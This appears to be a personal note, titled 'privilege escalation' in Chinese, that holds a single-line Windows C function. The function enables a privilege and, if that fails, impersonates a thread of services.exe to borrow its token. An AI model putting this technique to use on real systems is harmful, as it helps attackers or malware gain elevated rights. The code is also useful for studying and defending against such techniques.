@FadeTrack
2017-05-24T16:11:48.000000Z
字数 1443
阅读 1914
未分类
提权:
BOOL GetPrivilege(ULONG Priviliage){BOOL bRet = FALSE;NTSTATUS St;BOOLEAN bEnable;bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,FALSE,&bEnable)) || NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable));if (!bRet){PSYSTEM_PROCESSES_INFORMATION Processes = (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);if (Processes){UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");for (PSYSTEM_PROCESSES_INFORMATION Proc=Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta){if (RtlEqualUnicodeString(&Proc->ProcessName,&ProcessName,TRUE)){HANDLE hThread;OBJECT_ATTRIBUTES ObjAttr;InitializeObjectAttributes(&ObjAttr,NULL,0,0,0);St = NtOpenThread(&hThread,THREAD_DIRECT_IMPERSONATION,&ObjAttr,&Proc->Threads[0].ClientId);if (NT_SUCCESS(St)){SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);SecurityQos.ImpersonationLevel = SecurityImpersonation;SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;St = NtImpersonateThread(NtCurrentThread(),hThread,&SecurityQos);if (NT_SUCCESS(St)){St = RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable);bRet = NT_SUCCESS(St);if (!bRet){DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n",St);}}else{DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n",St);}NtClose(hThread);}else{DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n",St);}break;}if (!Proc->NextEntryDelta) break;}free(Processes);}}return bRet;}